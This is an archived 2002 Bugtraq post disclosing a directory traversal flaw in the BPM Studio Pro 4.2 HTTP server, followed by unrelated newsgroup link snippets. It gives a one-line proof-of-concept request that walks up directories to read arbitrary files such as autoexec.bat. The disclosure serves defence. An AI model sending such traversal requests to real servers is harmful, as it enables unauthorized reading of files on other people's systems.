BPM STUDIO PRO 4.2 DIRECTORY ESCAPE VULNERABILITY

From: ][-][UNTER (lopht@tutopia.com)
Date: 02/27/02 

From: "][-][UNTER" <lopht@tutopia.com>
To: <bugtraq@securityfocus.com>
Date: Wed, 27 Feb 2002 07:02:34 -0300

Hi bugtraq again...

Now i' ve found another vulnerability in BPM STUDIO PRO 4.2 http server
implementation.

Anyone can download any file in some host running this software simply like
performing this http request :

 http://BPM-HOST/../../../../autoexec.bat

http server is not activated by default...

byes

-----------------------------------------------
             ][-][UNTER
Infobyte Security Research Crew
      Buenos Aires, Argentina
-----------------------------------------------

Relevant Pages

  • Re: Max download to an IP address?
    ... an http server that uses standardized log formats, ... about what kind of download is taking place. ... If this is a standard Apache- type http server, ... limits just by looking at IP address. ...
    (comp.security.misc)
  • Re: Max download to an IP address?
    ... > have to look in the log regularily: just sort the logs by traffic ... > an http server that uses standardized log formats, ... > about what kind of download is taking place. ... > limits just by looking at IP address. ...
    (comp.security.misc)
  • Re: Progress Bar with urllib2
    ... On Tue, 26 Apr 2005 20:28:43 GMT, Andrew Godwin wrote: ... > I'm trying to write a python script to download data from a HTTP server. ...
    (comp.lang.python)
  • About WSAEventSelect Model Problem.
    ... I Write a HTTP client by WSAEventSelect Model, ... I cut a file to piece and download every piece ... // build the socket & connect the Http server ...
    (microsoft.public.win32.programmer.networks)
  • Http
    ... the upload as well the download of files from a http server that needs ... not support ftp so using the sun's ftp classes are out but i am not ...
    (comp.lang.java.gui)